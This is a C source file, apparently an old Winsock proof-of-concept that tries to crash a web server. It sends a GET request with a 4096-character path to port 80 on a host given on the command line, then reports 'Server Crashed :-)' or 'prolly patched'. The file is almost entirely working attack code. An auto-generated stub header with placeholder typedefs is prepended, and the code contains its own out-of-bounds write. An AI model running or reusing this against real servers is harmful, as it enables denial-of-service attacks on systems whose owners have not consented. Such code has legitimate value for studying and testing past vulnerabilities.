
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int trash ;
struct in_addr {int dummy; } ;
struct sockaddr_in {struct in_addr sin_addr; int sin_family; int sin_port; } ;
struct sockaddr {int dummy; } ;
struct hostent {scalar_t__ h_addr; } ;
typedef int myrequest ;
typedef int heck ;
typedef int buffer ;
typedef int WSADATA ;


 int AF_INET ;
 int SOCK_STREAM ;
 int WSACleanup () ;
 scalar_t__ WSAStartup (int,int *) ;
 int closesocket (int) ;
 int connect (int,struct sockaddr*,int) ;
 int exit (int ) ;
 struct hostent* gethostbyname (char*) ;
 int graphitte () ;
 int htons (int) ;
 int memset (char*,char,int) ;
 int printf (char*,...) ;
 int recv (int,char*,int,int ) ;
 int send (int,char*,int ,int ) ;
 int socket (int ,int ,int ) ;
 int sprintf (char*,char*,char*) ;
 int strlen (char*) ;

int main(int argc, char *argv[])
{

  WSADATA wsaData;




      int s;

  char trash[100];

struct hostent *yo;
   struct sockaddr_in heck;
  char buffer[4096] ="";
      char myrequest[5000];



  graphitte();



if(WSAStartup(0x0101,&wsaData)!=0) {
      printf("Error :Cudn't initiate winsock!");
      return 0;
      }
if(argc<2)
{printf("Usage : %s I.P/Hostname\n\n",argv[0]);
  exit(0);}
  if ( (yo = gethostbyname(argv[1]))==0)
  {
    printf("error: can't resolve '%s'",argv[1]);
    return 1;
  }
printf("\nChecking web server %s\n",argv[1]);


  heck.sin_port = htons(80);
  heck.sin_family = AF_INET;
  heck.sin_addr = *((struct in_addr *)yo->h_addr);
  if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
    printf("error: can't create socket");
    return 1;
  }

  if ((connect(s, (struct sockaddr *) &heck, sizeof(heck))) == -1){
    printf("Error:Cudn't Connect\r\n");
    return 1;
  }



buffer[sizeof(buffer)]=0x00;
  memset(buffer,'S',sizeof(buffer));
  memset(myrequest,0,sizeof(myrequest));
      memset(trash,0,sizeof(trash));
      sprintf(myrequest,"GET %s HTTP/1.0\r\n\r\n",buffer);

      printf("\r\nTrying oveflow request... ");
      send(s,myrequest,strlen(myrequest),0);

      printf("Evil Request SENT\r\n");
      recv(s,trash,sizeof(trash),0);
      if(trash[0]==0x00)
  {
      printf("Server Crashed :-) !.\r\n");


      }

  else


  printf("Server is prolly patched.\r\n");

  closesocket(s);




WSACleanup();



}
